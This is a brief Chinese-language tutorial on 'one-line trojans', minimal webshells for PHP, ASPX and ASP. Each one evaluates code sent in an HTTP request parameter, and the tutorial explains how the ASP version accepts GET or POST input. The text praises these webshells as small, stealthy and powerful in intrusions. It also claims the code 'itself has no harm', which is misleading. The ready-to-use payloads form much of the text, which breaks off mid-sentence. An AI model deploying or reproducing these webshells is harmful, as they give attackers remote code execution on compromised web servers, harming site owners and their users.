介绍
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。
常用一句话木马
php一句话木马:
<?php @eval($_POST[value]);?>
aspx一句话木马:
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
asp一句话木马:
<%execute(request(“v”))%>
代码本身没有任何危害,但通过代码上传一些恶意的东西(如下载,翻越,删除,新建)时可能会对网站造成一定危害。
分析一句话木马
<%execute(request(“v”))%>
execute:是用来执行传过来的数据。
request:通过客户端定义了一个request接收的方式,服务端接收客户端传过来数据有get,post,request等方式。如果在脚本里写get的话,脚本传送数据只能用get方式,同理写成post的话,只能用post传输,但如果写成request的话,get,post传过来的数据,我都能接收。
V:如果网站只支持ASP脚本,就要上传ASP马&